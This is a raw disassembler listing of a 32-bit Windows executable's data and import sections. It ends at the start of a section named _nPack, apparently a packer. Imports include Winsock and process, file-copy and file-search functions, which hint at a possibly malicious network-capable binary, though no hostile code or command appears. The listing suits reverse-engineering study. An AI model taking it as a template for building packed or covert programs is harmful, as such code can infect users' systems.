dword_4929B4 dd 77C26E79h ; DATA XREF: sub_41DAE9:loc_41DB0C�r
; sub_41DAE9+38�r ...
word_4929B8 dw 0 ; DATA XREF: sub_41E247+1A�o
; sub_41E247+46�r
byte_4929BA db 0 ; DATA XREF: sub_41E247+39�r
align 4
dword_4929BC dd 7 dup(0) ; DATA XREF: sub_41E247+52�o
dword_4929D8 dd 0 ; DATA XREF: sub_41E247+40�w
; sub_41E247+5C�o
dword_4929DC dd 0 ; DATA XREF: sub_41E247+4D�w
dword_4929E0 dd 0 ; DATA XREF: sub_41E247+31�w
dword_4929E4 dd 0 ; DATA XREF: sub_41E247+52�w
dword_4929E8 dd 0 ; DATA XREF: sub_41C300+154�w
; sub_41CB5F:loc_41CB88�w ...
dword_4929EC dd 1 ; DATA XREF: sub_41EACD+26�r
; sub_41EACD:loc_41EB37�w
dword_4929F0 dd 0 ; DATA XREF: sub_41C300+7�r
align 8
dword_4929F8 dd 0 ; DATA XREF: sub_41F1B2+11�w
; sub_41F1B2+63�w ...
align 10h
dword_492A00 dd 0 ; DATA XREF: sub_41F1B2+33�o
; sub_41F1B2+46�r
dword_492A04 dd 10h dup(0) ; DATA XREF: sub_41F1B2+C1�o
word_492A44 dw 0 ; DATA XREF: sub_41F410+A8�r
word_492A46 dw 0 ; DATA XREF: sub_41F1B2+54�r
; sub_41F410+DB�r ...
word_492A48 dw 0 ; DATA XREF: sub_41F410+CA�r
word_492A4A dw 0 ; DATA XREF: sub_41F410+D3�r
; sub_41F410:loc_41F502�r
word_492A4C dw 0 ; DATA XREF: sub_41F410+C0�r
word_492A4E dw 0 ; DATA XREF: sub_41F410+B8�r
word_492A50 dw 0 ; DATA XREF: sub_41F410+B0�r
word_492A52 dw 0 ; DATA XREF: sub_41F410+9E�r
dword_492A54 dd 0 ; DATA XREF: sub_41F1B2+4B�r
dword_492A58 dd 10h dup(0) ; DATA XREF: sub_41F1B2+FB�o
word_492A98 dw 0 ; DATA XREF: sub_41F410+46�r
word_492A9A dw 0 ; DATA XREF: sub_41F1B2:loc_41F229�r
; sub_41F410+78�r ...
word_492A9C dw 0 ; DATA XREF: sub_41F410+67�r
word_492A9E dw 0 ; DATA XREF: sub_41F410+70�r
; sub_41F410:loc_41F494�r
word_492AA0 dw 0 ; DATA XREF: sub_41F410+5D�r
word_492AA2 dw 0 ; DATA XREF: sub_41F410+55�r
word_492AA4 dw 0 ; DATA XREF: sub_41F410+4D�r
word_492AA6 dw 0 ; DATA XREF: sub_41F410+3E�r
dword_492AA8 dd 0 ; DATA XREF: sub_41F1B2+80�r
dword_492AAC dd 0 ; DATA XREF: sub_41F1B2+132�r
; sub_41F1B2:loc_41F2FE�r ...
dword_492AB0 dd 0 ; DATA XREF: sub_41F19D�r sub_41F19D+E�w
dword_492AB4 dd 0 ; DATA XREF: sub_41F80A+3�r
; sub_41F80A+2E�w ...
dword_492AB8 dd 0 ; DATA XREF: sub_41F80A+43�w
; sub_41F80A:loc_41F859�r
dword_492ABC dd 0 ; DATA XREF: sub_41F80A+4A�w
; sub_41F80A+60�r
dword_492AC0 dd 0 ; DATA XREF: .text:loc_4202CB�r
; .text:004202D1�w ...
dword_492AC4 dd 0 ; DATA XREF: .text:loc_4202AF�r
; .text:004202B5�w ...
dword_492AC8 dd 0 ; DATA XREF: .text:00420285�r
; .text:0042028B�w ...
dword_492ACC dd 0 ; DATA XREF: .text:loc_4202BD�r
; .text:004202C3�w ...
dword_492AD0 dd 0 ; DATA XREF: .text:loc_420254�r
; .text:0042026F�w
dword_492AD4 dd 0 ; DATA XREF: sub_41EEE4+3F�r
dword_492AD8 dd 0 ; DATA XREF: sub_420AE1+28�r
; sub_420AE1+48�w ...
byte_492ADC db 1 ; DATA XREF: sub_402B66�r sub_402B66+9�w ...
align 10h
dd 0
db 0
byte_492AE5 db 1 ; DATA XREF: sub_415887+15�r
; sub_415887+1E�w
align 10h
dword_492AF0 dd 944968h ; DATA XREF: sub_41BFC4:loc_41BFD5�r
; sub_41C470+14�r ...
dd 0D3h dup(0)
dword_492E40 dd 400h dup(0) ; DATA XREF: .data:off_436200�o
; .data:00436208�o
dword_493E40 dd 200h ; DATA XREF: sub_41BFC4+9�r
; sub_41BFC4+56�r ...
dd 7 dup(0)
dword_493E60 dd 950EF0h ; DATA XREF: sub_41A9D8+B1�r
; sub_41C031+75�r ...
dword_493E64 dd 3Fh dup(0) ; DATA XREF: sub_41D67E+92�o
dword_493F60 dd 0Fh dup(0) ; DATA XREF: .text:0041D842�o
; sub_41EC16+42�o
dword_493F9C dd 20h ; DATA XREF: sub_41BE46+8�r
; sub_41C10A+C�r ...
dword_493FA0 dd 4E4h ; DATA XREF: sub_41C6E5+14�r
; sub_41C6E5+65�w ...
dd 1Fh dup(0)
dword_494020 dd 3 dup(0) ; DATA XREF: sub_41C6E5+123�o
; sub_41C6E5+171�o ...
dword_49402C dd 0 ; DATA XREF: sub_41C6E5+108�w
; sub_41C6E5+15D�w ...
dd 4 dup(0)
byte_494040 db 0 ; DATA XREF: sub_41C924:loc_41CA30�w
; sub_41C924:loc_41CA4D�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_494140 db 0 ; DATA XREF: sub_41C6E5+5C�o
; sub_41C6E5+AF�o ...
byte_494141 db 0 ; DATA XREF: sub_417900+5D�r
; sub_41C6E5+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_494244 dd 0 ; DATA XREF: sub_41C6E5+6E�w
; sub_41C6E5+12B�w ...
dword_494248 dd 10h ; DATA XREF: sub_4182D9+32�w
; sub_418976+5�r ...
dd 3 dup(0)
dword_494258 dd 0 ; DATA XREF: sub_418342+239�r
; sub_418342+259�r ...
dword_49425C dd 940650h ; DATA XREF: sub_4182D9+2D�w
; sub_418342+310�w ...
dword_494260 dd 0 ; DATA XREF: sub_4182D9:loc_4182F6�w
; sub_418342+22C�r ...
dword_494264 dd 1 ; DATA XREF: .text:0041824A�r
; .text:00418293�r ...
dword_494268 dd 940650h ; DATA XREF: .text:00418259�r
; .text:loc_41829D�r ...
dword_49426C dd 940000h ; DATA XREF: sub_415D36+28�r
; sub_415D6C+21�r ...
dd 2 dup(0)
dword_494278 dd 142340h ; DATA XREF: sub_417ED0+7A�w
; sub_41D1EE+F�r ...
dd 2 dup(0)
dword_494284 dd 1 ; DATA XREF: sub_41D246+AD�w
; sub_4206A5�r
dd 3 dup(0)
dword_494294 dd 1 ; DATA XREF: sub_41CAB9�r
; sub_41CAB9+11�w ...
dword_494298 dd 950E6Ch ; DATA XREF: sub_416773+13�r
; sub_416773:loc_4167B5�r ...
dword_49429C dd 950E60h ; DATA XREF: sub_416773+1�r
; sub_416773+C�r ...
align 1000h
_data ends
; Section 4. (virtual address 00095000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00095000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 495000h
dd 95268h, 2 dup(0)
dd 95584h, 9550Ch, 9503Ch, 2 dup(0)
dd 95D30h, 952E0h, 5 dup(0)
dd 958B0h, 95D16h, 95D04h, 95CF2h, 95CE2h, 95CCAh, 95CB6h
dd 95CA6h, 95C94h, 95C82h, 95C72h, 95C62h, 95C44h, 95C36h
dd 95C26h, 95C14h, 95BFAh, 95590h, 95598h, 955A8h, 955B8h
dd 955CEh, 955DCh, 955F4h, 9560Ch, 9561Ch, 95644h, 9565Ch
dd 9566Ch, 9567Ah, 9568Ch, 9569Ah, 956A6h, 956B4h, 956CAh
dd 956DCh, 956EEh, 956FCh, 95712h, 9571Eh, 95736h, 95750h
dd 95760h, 95772h, 9577Eh, 95790h, 9579Eh, 957ACh, 957C2h
dd 957CEh, 957E4h, 957F8h, 9580Eh, 9581Eh, 95830h, 95840h
dd 9584Ch, 9585Ch, 9586Eh, 95880h, 95890h, 9589Eh, 958C0h
dd 958D6h, 958E4h, 958F2h, 9590Eh, 95924h, 9593Ah, 9594Eh
dd 95962h, 95976h, 95982h, 95994h, 959A4h, 959B8h, 959D2h
dd 959E0h, 959F2h, 95A0Eh, 95A28h, 95A44h, 95A5Ah, 95A66h
dd 95A72h, 95A7Eh, 95A8Ch, 95AA6h, 95AB6h, 95AC8h, 95ADAh
dd 95AE8h, 95AFAh, 95B08h, 95B16h, 95B24h, 95B34h, 95B44h
dd 95B50h, 95B5Ch, 95B66h, 95B72h, 95B82h, 95B92h, 95BAEh
dd 95BC8h, 95BE2h, 20h dup(0)
dd 8000000Bh, 80000004h, 80000074h, 80000073h, 80000015h
dd 8000000Ah, 80000009h, 80000002h, 8000000Dh, 80000001h
dd 80000010h, 80000003h, 80000017h, 80000013h, 80000012h
dd 80000097h, 0Eh dup(0)
dword_4952E0 dd 77E74D76h ; DATA XREF: sub_40FD2B+36�r
; .text:004211DE�r
dword_4952E4 dd 77E6BD68h ; DATA XREF: sub_420D89+173�r
; .text:0042134C�r
dword_4952E8 dd 77E77F2Eh ; DATA XREF: sub_420AE1+3E�r
; sub_420AE1+261�r ...
dword_4952EC dd 77E762D0h ; DATA XREF: sub_420AE1+5B�r
; sub_420AE1+B9�r ...
dword_4952F0 dd 77E70192h ; DATA XREF: sub_42055F+F9�r
; .text:0042133A�r
dword_4952F4 dd 77E76968h ; DATA XREF: .text:00420264�r
; .text:00421334�r
dword_4952F8 dd 77E73FF9h ; DATA XREF: sub_41EE76+2C�r
; .text:0042132E�r
dword_4952FC dd 77E7FF2Eh ; DATA XREF: sub_41ECAB:loc_41ECFB�r
; sub_41ED22:loc_41ED75�r ...
dword_495300 dd 77E7C866h ; DATA XREF: sub_41EACD+3F�r
; sub_41EACD+12D�r ...
dword_495304 dd 77E641EBh ; DATA XREF: sub_41EACD+59�r
; sub_41EACD+8D�r ...
dword_495308 dd 77E7176Ch ; DATA XREF: sub_41E3A2+8�r
; .text:00421316�r
dword_49530C dd 77E7339Ch ; DATA XREF: sub_41E36A+C�r
; .text:00421310�r
dword_495310 dd 77E7C9E7h ; DATA XREF: sub_41DB2F+5�r
; sub_41DB40+6�r ...
dword_495314 dd 77E78406h ; DATA XREF: sub_41D67E+FF�r
; sub_41D67E+166�r ...
dword_495318 dd 77E79C3Dh ; DATA XREF: sub_41D67E+158�r
; sub_41D965+143�r ...
dword_49531C dd 77E7C931h ; DATA XREF: sub_41D67E+19D�r
; .text:004212F8�r
dword_495320 dd 77E77EE1h ; DATA XREF: sub_41D54C+9�r
; .text:004212F2�r
dword_495324 dd 77E61BE6h ; DATA XREF: sub_402413+19C�r
; sub_402B90+F9�r ...
dword_495328 dd 77F5157Dh ; DATA XREF: sub_403661:loc_40379D�r
; sub_403661:loc_4038C1�r ...
dword_49532C dd 77E7AC37h ; DATA XREF: sub_403661+10E�r
; sub_403661+22D�r ...
dword_495330 dd 77E7A099h ; DATA XREF: sub_403661+58�r
; sub_403661+177�r ...
dword_495334 dd 77E73C49h ; DATA XREF: .text:00404109�r
; .text:004043D3�r ...
dword_495338 dd 77F7E300h ; DATA XREF: .text:0040403A�r
; .text:004210EE�r
dword_49533C dd 77F7E21Fh ; DATA XREF: .text:00403FCF�r
; .text:004210F4�r
dword_495340 dd 77E7751Ah ; DATA XREF: .text:00403F2D�r
; .text:00404E16�r ...
dword_495344 dd 77E7C706h ; DATA XREF: .text:0040420B�r
; .text:00421100�r
dword_495348 dd 77F53275h ; DATA XREF: .text:004041FF�r
; .text:004043C3�r ...
dword_49534C dd 77E70F89h ; DATA XREF: sub_4045C0+D�r
; sub_4174F2+D�r ...
dword_495350 dd 77E75CB5h ; DATA XREF: .text:004051C5�r
; .text:004058FE�r ...
dword_495354 dd 77E61BB8h ; DATA XREF: .text:004051AF�r
; .text:004058C6�r ...
dword_495358 dd 77E77963h ; DATA XREF: .text:00404F7C�r
; .text:004058D7�r ...
dword_49535C dd 77E79D8Ch ; DATA XREF: .text:00404E84�r
; sub_40FF61+AE�r ...
dword_495360 dd 77E7A837h ; DATA XREF: .text:00404DAA�r
; sub_406B82+1C4�r ...
dword_495364 dd 77E704FCh ; DATA XREF: .text:00405893�r
; sub_407BA3+C7�r ...
dword_495368 dd 77E64106h ; DATA XREF: .text:00406A3F�r
; sub_414190+1B6�r ...
dword_49536C dd 77E64006h ; DATA XREF: .text:00406A2B�r
; sub_414190+19F�r ...
dword_495370 dd 77E793EFh ; DATA XREF: sub_406B82+1EE�r
; sub_407700+38�r ...
dword_495374 dd 77E74CABh ; DATA XREF: sub_406B82+110�r
; sub_407BA3+19E�r ...
dword_495378 dd 77E78EAAh ; DATA XREF: sub_406EDE+5E8�r
; .text:0042114E�r
dword_49537C dd 77E79424h ; DATA XREF: sub_406EDE+27B�r
; .text:00421154�r
dword_495380 dd 77E794BFh ; DATA XREF: sub_406EDE+26D�r
; .text:0042115A�r
dword_495384 dd 77E75E67h ; DATA XREF: sub_406EDE+20D�r
; sub_406EDE+5D7�r ...
dword_495388 dd 77E75D9Eh ; DATA XREF: sub_406EDE+1FC�r
; .text:00421166�r
dword_49538C dd 77E78B82h ; DATA XREF: sub_407700+80�r
; sub_41354F+B�r ...
dword_495390 dd 77E78C81h ; DATA XREF: sub_407700+6C�r
; sub_41CE78+4F�r ...
dword_495394 dd 77E73628h ; DATA XREF: sub_407BA3+33B�r
; sub_4087B3+35A8�r ...
dword_495398 dd 77E706B7h ; DATA XREF: sub_407BA3+274�r
; sub_411876+B9�r ...
dword_49539C dd 77E80656h ; DATA XREF: sub_407BA3+267�r
; .text:00421184�r
dword_4953A0 dd 77E6BD13h ; DATA XREF: sub_407BA3:loc_407D5E�r
; .text:0042118A�r
dword_4953A4 dd 77E70396h ; DATA XREF: sub_407BA3+1B5�r
; sub_407BA3+221�r ...
dword_4953A8 dd 77E79F93h ; DATA XREF: sub_407BA3+D6�r
; sub_40E59D+2�r ...
dword_4953AC dd 77E79D5Bh ; DATA XREF: sub_407BA3+6B�r
; sub_407BA3+311�r ...
dword_4953B0 dd 77E7C2C4h ; DATA XREF: sub_407BA3+64�r
; .text:004211A2�r
dword_4953B4 dd 77E75CEBh ; DATA XREF: sub_4087B3+3819�r
; .text:00413203�r ...
dword_4953B8 dd 77E6AD34h ; DATA XREF: sub_4087B3+2C70�r
; sub_40FF61+35�r ...
dword_4953BC dd 77E71AFEh ; DATA XREF: sub_4087B3+2B33�r
; .text:004211B4�r
dword_4953C0 dd 77E805D8h ; DATA XREF: sub_40E59D+13A�r
; sub_40E59D:loc_40EA8D�r ...
dword_4953C4 dd 77E7A5FDh ; DATA XREF: sub_40E59D+11�r
; sub_419C71+15�r ...
dword_4953C8 dd 77E76A60h ; DATA XREF: sub_40FC36+2D�r
; .text:004211C6�r
dword_4953CC dd 77E71B14h ; DATA XREF: sub_40FCE2+26�r
; .text:004211CC�r
dword_4953D0 dd 77E7166Fh ; DATA XREF: sub_40FCE2+1D�r
; .text:004211D2�r
dword_4953D4 dd 77E75090h ; DATA XREF: sub_40FD2B+69�r
; .text:004211D8�r
dword_4953D8 dd 77E77797h ; DATA XREF: sub_40FD2B+25�r
; .text:004211E4�r
dword_4953DC dd 77E7011Ah ; DATA XREF: sub_40FDCD+96�r
; .text:004211EA�r
dword_4953E0 dd 77E73CE2h ; DATA XREF: sub_40FDCD+60�r
; .text:004211F0�r
dword_4953E4 dd 77E668D9h ; DATA XREF: sub_40FF61+15D�r
; .text:004211F6�r
dword_4953E8 dd 77E79924h ; DATA XREF: sub_410714+13�r
; sub_41CC29+20D�r ...
dword_4953EC dd 77E77CCEh ; DATA XREF: sub_410819+F�r
; sub_417D0C+54�r ...
dword_4953F0 dd 77E65F4Ch ; DATA XREF: sub_4113B6+34�r
; .text:00412309�r ...
dword_4953F4 dd 77E79C90h ; DATA XREF: sub_4117F1+C�r
; sub_413440+3A�r ...
dword_4953F8 dd 77E616B4h ; DATA XREF: sub_411876+113�r
; sub_411876+21B�r ...
dword_4953FC dd 77E76A2Eh ; DATA XREF: sub_411876+DE�r
; .text:0042121A�r
dword_495400 dd 77E7513Ch ; DATA XREF: .text:004123C7�r
; .text:00421220�r
dword_495404 dd 77E7C657h ; DATA XREF: .text:00412458�r
; .text:0041400C�r ...
dword_495408 dd 77E6C29Dh ; DATA XREF: sub_412D63:loc_412F4E�r
; .text:0042122C�r
dword_49540C dd 77E74C59h ; DATA XREF: .text:0041322B�r
; .text:00421232�r
dword_495410 dd 77E7727Ah ; DATA XREF: sub_413309+23�r
; .text:00421238�r
dword_495414 dd 77E79CE3h ; DATA XREF: sub_413440+77�r
; .text:0042123E�r
dword_495418 dd 77EC7C51h ; DATA XREF: sub_41362D+5E�r
; .text:00421244�r
dword_49541C dd 77E802FCh ; DATA XREF: sub_413B9E+109�r
; sub_413B9E+250�r ...
dword_495420 dd 77E6D75Bh ; DATA XREF: sub_413B9E+FF�r
; .text:00421250�r
dword_495424 dd 77E76C1Ah ; DATA XREF: sub_414190+1CF�r
; .text:00421256�r
dword_495428 dd 77F516F8h ; DATA XREF: sub_415D36+2E�r
; sub_416ED2+AF�r ...
dword_49542C dd 77F51597h ; DATA XREF: sub_415D6C+27�r
; .text:00418251�r ...
dword_495430 dd 77F6183Eh ; DATA XREF: sub_421268�r
dword_495434 dd 77F5722Fh ; DATA XREF: sub_416ED2+F0�r
; sub_418976+28�r ...
dword_495438 dd 77E76E3Dh ; DATA XREF: sub_4174F2+6C�r
; sub_41F1B2+38�r ...
dword_49543C dd 77E61608h ; DATA XREF: sub_4174F2+17�r
; .text:0042127A�r
dword_495440 dd 77E6177Ah ; DATA XREF: sub_417ED0+9F�r
; sub_41D67E+59�r ...
dword_495444 dd 77E7C938h ; DATA XREF: sub_417ED0+74�r
; .text:00421286�r
dword_495448 dd 77E7C486h ; DATA XREF: sub_417ED0+26�r
; .text:0042128C�r
dword_49544C dd 77E6D706h ; DATA XREF: sub_4181A0+2E�r
; sub_419407+215�r ...
dword_495450 dd 77E76E0Bh ; DATA XREF: sub_41820B+2F�r
; .text:004182B3�r ...
dword_495454 dd 77E7C726h ; DATA XREF: sub_41820B+11�r
; .text:0042129E�r
dword_495458 dd 77E79E34h ; DATA XREF: .text:00418260�r
; sub_418342+23F�r ...
dword_49545C dd 77E7980Ah ; DATA XREF: sub_418976+76�r
; sub_418A27+51�r ...
dword_495460 dd 77E73196h ; DATA XREF: .text:00418F07�r
; .text:00418F40�r ...
dword_495464 dd 77F522F2h ; DATA XREF: sub_41B2F7+21�r
; .text:004212B6�r
dword_495468 dd 77E7849Fh ; DATA XREF: sub_41C6E5+48�r
; sub_41C924+14�r ...
dword_49546C dd 77E7A13Fh ; DATA XREF: sub_41C87E+2F�r
; .text:004212C2�r
dword_495470 dd 77E6C703h ; DATA XREF: sub_41C87E+1A�r
; .text:004212C8�r
dword_495474 dd 77E77405h ; DATA XREF: sub_41CC29+5E�r
; sub_41CC29+A7�r ...
dword_495478 dd 77E781F9h ; DATA XREF: sub_41CC29+42�r
; sub_41CC29+14D�r ...
dword_49547C dd 77EB9A84h ; DATA XREF: sub_41D06A+138�r
; .text:004212DA�r
dword_495480 dd 77E9C5B1h ; DATA XREF: sub_41D54C+11F�r
; .text:004212E0�r
dword_495484 dd 77E7C9E1h ; DATA XREF: sub_41D54C+CE�r
; .text:004212E6�r
dword_495488 dd 77E67702h ; DATA XREF: sub_41D54C:loc_41D57B�r
; sub_41D54C+E1�r ...
dd 20h dup(0)
dword_49550C dd 71AB12F8h ; DATA XREF: sub_4062D3+35�r
; .text:004210CA�r
dword_495510 dd 71AB3E5Dh ; DATA XREF: sub_4062D3+57�r
; .text:004210C4�r
dword_495514 dd 71AB1836h ; DATA XREF: sub_4062D3+6E�r
; sub_40636F+8E�r ...
dword_495518 dd 71AB41DAh ; DATA XREF: .text:00405B97�r
; sub_4062D3+15�r ...
dword_49551C dd 71AB3F8Dh ; DATA XREF: .text:00405BDD�r
; .text:004210B2�r
dword_495520 dd 71AB155Ah ; DATA XREF: .text:00405BED�r
; .text:004210AC�r
dword_495524 dd 71AB1746h ; DATA XREF: .text:00405C03�r
; sub_4062D3+41�r ...
dword_495528 dd 71AB3ECEh ; DATA XREF: .text:00405C14�r
; .text:004210A0�r
dword_49552C dd 71AB5DE2h ; DATA XREF: .text:00405C28�r
; .text:0042109A�r
dword_495530 dd 71AB868Dh ; DATA XREF: .text:00405CD0�r
; .text:00421094�r
dword_495534 dd 71AB5690h ; DATA XREF: .text:00405D40�r
; .text:0042108E�r
dword_495538 dd 71AB1A6Dh ; DATA XREF: .text:00405D91�r
; sub_4062D3+68�r ...
dword_49553C dd 71AB3C22h ; DATA XREF: sub_402413+B7�r
; .text:00405BC4�r ...
dword_495540 dd 71AB1AF4h ; DATA XREF: sub_40205B+12�r
; .text:00405C34�r ...
dword_495544 dd 71AB1890h ; DATA XREF: sub_401E57+4C�r
; .text:00405C65�r ...
dword_495548 dd 71AB1B7Bh ; DATA XREF: sub_421070�r
dd 0Eh dup(0)
aWs2_32_dll_0 db 'WS2_32.dll',0
align 10h
dd 6C530296h, 706565h, 6547011Ah, 73614C74h, 72724574h
dd 726Fh, 7243004Ah, 65746165h, 65726854h, 6461h, 65470124h
dd 646F4D74h, 46656C75h, 4E656C69h, 41656D61h, 7E0000h
dd 74697845h, 65726854h, 6461h, 654C01C1h, 43657661h, 69746972h
dd 536C6163h, 69746365h, 6E6Fh, 6E450066h, 43726574h, 69746972h
dd 536C6163h, 69746365h, 6E6Fh, 6547016Dh, 63695474h, 756F436Bh
dd 746Eh, 6E4901ABh, 61697469h, 657A696Ch, 74697243h, 6C616369h
dd 74636553h, 416E6F69h, 7053646Eh, 6F436E69h, 746E75h
dd 65440055h, 6574656Ch, 74697243h, 6C616369h, 74636553h
dd 6E6F69h, 6547011Bh, 636F4C74h, 69546C61h, 656Dh, 7845007Dh
dd 72507469h, 7365636Fh, 440073h, 61657243h, 72506574h
dd 7365636Fh, 4173h, 6C43001Bh, 4865736Fh, 6C646E61h, 2DF0065h
dd 74697257h, 6C694665h, 340065h, 61657243h, 69466574h
dd 41656Ch, 65470159h, 73795374h, 446D6574h, 63657269h
dd 79726F74h, 16E0041h, 54746547h, 46656D69h, 616D726Fh
dd 4174h, 654700FBh, 74614474h, 726F4665h, 4174616Dh, 1120000h
dd 46746547h, 53656C69h, 657A69h, 6547010Dh, 6C694674h
dd 74744165h, 75626972h, 41736574h, 900000h, 646E6946h
dd 736F6C43h, 8A0065h, 656C6946h, 656D6954h, 79536F54h
dd 6D657473h, 656D6954h, 890000h, 656C6946h, 656D6954h
dd 6F4C6F54h, 466C6163h, 54656C69h, 656D69h, 6946009Dh
dd 654E646Eh, 69467478h, 41656Ch, 69460094h, 6946646Eh
dd 46747372h, 41656C69h, 2180000h, 64616552h, 656C6946h
dd 26A0000h, 46746553h, 50656C69h, 746E696Fh, 7265h, 65440057h
dd 6574656Ch, 656C6946h, 1EF0041h, 6E65704Fh, 636F7250h
dd 737365h, 654700F8h, 72754374h, 746E6572h, 636F7250h
dd 49737365h, 280064h, 79706F43h, 656C6946h, 2680041h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 4173h, 65470126h
dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 615702CEh, 6F467469h
dd 6E695372h, 4F656C67h, 63656A62h, 3F0074h, 61657243h
dd 754D6574h, 41786574h, 29F0000h, 6D726554h, 74616E69h
dd 72685465h, 646165h, 65470165h, 6D655474h, 74615070h
dd 4168h, 6F4D01DDh, 69466576h, 41656Ch, 6F4C01C2h, 694C6461h
dd 72617262h, 4179h, 6547013Eh, 6F725074h, 64644163h, 73736572h
dd 0AF0000h, 6D726F46h, 654D7461h, 67617373h, 4165h, 6C470193h
dd 6C61626Fh, 6F6C6E55h, 6B63h, 6C47018Ch, 6C61626Fh, 6B636F4Ch
dd 2B00000h, 616D6E55h, 65695670h, 46664F77h, 656C69h
dd 614D01D6h, 65695670h, 46664F77h, 656C69h, 72430035h
dd 65746165h, 656C6946h, 7070614Dh, 41676E69h, 26C0000h
dd 46746553h, 54656C69h, 656D69h, 65470114h, 6C694674h
dd 6D695465h, 800065h, 61707845h, 6E45646Eh, 6F726976h
dd 6E656D6Eh, 72745374h, 73676E69h, 2D20041h, 65646957h
dd 72616843h, 754D6F54h, 4269746Ch, 657479h, 754D01E4h
dd 4269746Ch, 54657479h, 6469576Fh, 61684365h, 0CE0072h
dd 43746547h, 75706D6Fh, 4E726574h, 41656D61h, 0F70000h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 29E0073h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 2FF0000h
dd 7274736Ch, 69706D63h, 11C0041h, 4C746547h, 6C61636Fh
dd 666E4965h, 416Fh, 65470175h, 72655674h, 6E6F6973h, 417845h
dd 65470120h, 676F4C74h, 6C616369h, 76697244h, 7365h, 615702CCh
dd 6F467469h, 6C754D72h, 6C706974h, 6A624F65h, 73746365h
dd 430000h, 61657243h, 69506574h, 6570h, 75440063h, 63696C70h
dd 48657461h, 6C646E61h, 0B80065h, 656E6547h, 65746172h
dd 736E6F43h, 43656C6Fh, 456C7274h, 746E6576h, 2060000h
dd 72657551h, 72655079h, 6D726F66h, 65636E61h, 6E756F43h
dd 726574h, 75510207h, 50797265h, 6F667265h, 6E616D72h
dd 72466563h, 65757165h, 79636Eh, 6C47018Dh, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 1990000h, 70616548h
dd 6F6C6C41h, 19F0063h, 70616548h, 65657246h, 22F0000h
dd 556C7452h, 6E69776Eh, 1A20064h, 70616548h, 6C416552h
dd 636F6Ch, 65470170h, 6D695474h, 6E6F5A65h, 666E4965h
dd 616D726Fh, 6E6F6974h, 15D0000h, 53746547h, 65747379h
dd 6D69546Dh, 1500065h, 53746547h, 74726174h, 6E497075h
dd 416F66h, 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch
dd 1740041h, 56746547h, 69737265h, 6E6Fh, 6152020Bh, 45657369h
dd 70656378h, 6E6F6974h, 19D0000h, 70616548h, 74736544h
dd 796F72h, 6548019Bh, 72437061h, 65746165h, 2BF0000h
dd 74726956h, 466C6175h, 656572h, 695602BBh, 61757472h
dd 6C6C416Ch, 636Fh, 734901B8h, 57646142h, 65746972h, 727450h
dd 654801A3h, 69537061h, 657Ah, 654700BFh, 49504374h, 6F666Eh
dd 654700B9h, 50434174h, 1310000h, 4F746547h, 50434D45h
dd 1BF0000h, 614D434Ch, 72745370h, 41676E69h, 1C00000h
dd 614D434Ch, 72745370h, 57676E69h, 2AD0000h, 61686E55h
dd 656C646Eh, 63784564h, 69747065h, 69466E6Fh, 7265746Ch
dd 0B20000h, 65657246h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 417367h, 724600B3h, 6E456565h, 6F726976h
dd 6E656D6Eh, 72745374h, 73676E69h, 1060057h, 45746547h
dd 7269766Eh, 656D6E6Fh, 7453746Eh, 676E6972h, 1080073h
dd 45746547h, 7269766Eh, 656D6E6Fh, 7453746Eh, 676E6972h
dd 5773h, 6553026Dh, 6E614874h, 43656C64h, 746E756Fh, 1520000h
dd 53746547h, 61486474h, 656C646Eh, 1150000h, 46746547h
dd 54656C69h, 657079h, 6553028Bh, 686E5574h, 6C646E61h
dd 78456465h, 74706563h, 466E6F69h, 65746C69h, 1B50072h
dd 61427349h, 61655264h, 72745064h, 1B20000h, 61427349h
dd 646F4364h, 72745065h, 1530000h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470156h, 72745374h, 54676E69h, 57657079h
dd 27C0000h, 53746553h, 61486474h, 656C646Eh, 0AA0000h
dd 73756C46h, 6C694668h, 66754265h, 73726566h, 2410000h
dd 43746553h, 6F736E6Fh, 7443656Ch, 61486C72h, 656C646Eh
dd 2610072h, 45746553h, 664F646Eh, 656C6946h, 210000h
dd 706D6F43h, 53657261h, 6E697274h, 4167h, 6F430022h, 7261706Dh
dd 72745365h, 57676E69h, 2620000h, 45746553h, 7269766Eh
dd 656D6E6Fh, 6156746Eh, 62616972h, 41656Ch, 4E52454Bh
dd 32334C45h, 6C6C642Eh, 0
dd 74h, 0AFh dup(0)
_idata ends
; Section 5. (virtual address 00096000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00096000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_nPack segment para public 'DATA' use32
assume cs:_nPack
;org 496000h
; =============== S U B R O U T I N E =======================================
